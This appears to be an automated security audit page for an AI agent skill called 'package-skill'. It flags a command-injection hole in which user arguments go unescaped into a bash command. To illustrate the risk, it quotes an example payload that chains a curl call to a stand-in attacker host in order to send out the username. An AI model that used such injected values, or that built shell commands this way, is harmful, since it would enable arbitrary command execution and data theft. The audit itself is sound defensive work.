Skills
skills/bluewaves-creations/bluewaves-skills/package-skill/Gen Agent Trust Hub

package-skill

Fail

Audited by Gen Agent Trust Hub on Mar 28, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill directly interpolates the $ARGUMENTS variable into a bash shell command.
  • Evidence (SKILL.md): python3 "$SCRIPT" $ARGUMENTS
  • Risk: Because $ARGUMENTS is derived from user input or external data without escaping or validation, an attacker can provide input containing shell metacharacters (e.g., ;, &&, |) to execute arbitrary commands on the host system. For example, providing an argument like my-skill ; curl http://attacker.com/$(whoami) would result in unauthorized data exfiltration or system compromise.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 28, 2026, 10:15 PM